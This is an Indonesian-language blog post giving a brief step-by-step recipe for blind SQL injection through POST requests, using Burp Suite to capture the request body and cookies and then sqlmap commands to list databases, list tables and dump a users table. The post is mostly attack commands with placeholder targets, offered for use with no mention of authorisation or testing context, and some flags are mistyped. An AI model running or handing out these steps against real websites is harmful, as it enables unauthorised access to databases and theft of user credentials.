SQL Injection Post (blind slq injection) sql injection yang tanpa pesan error



Blind SQL Injection (Post Method)

Buka Burpsuite intercept data misalnya  di body ada : id=1&submit=submit

# sqlmap -u 'http://(burpsuite Post)' --data='id=1&submit=submit(body)' --cookie='PHPSESID=xxxx;xxx' --random-agent --referer='http://xxx' -p id --db

Y

Y

Y

kalau sudah ketemu databasenya

# sqlmap -u 'http://(burpsuite Post)' --data='id=1&submit=submit(body)' --cookie='PHPSESID=xxxx;xxx' --random-agent --referer='http://xxx' -p id --D dbname --tables 


kalau sudah ketemu table nya 

# sqlmap -u 'http://(burpsuite Post)' --data='id=1&submit=submit(body)' --cookie='PHPSESID=xxxx;xxx' --random-agent --referer='http://xxx' -p id --D dbname -T users

dump

dst...

kalau belum jelas lihat di sini :

https://www.youtube.com/watch?v=7PrUX2587A0 

Published by On

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)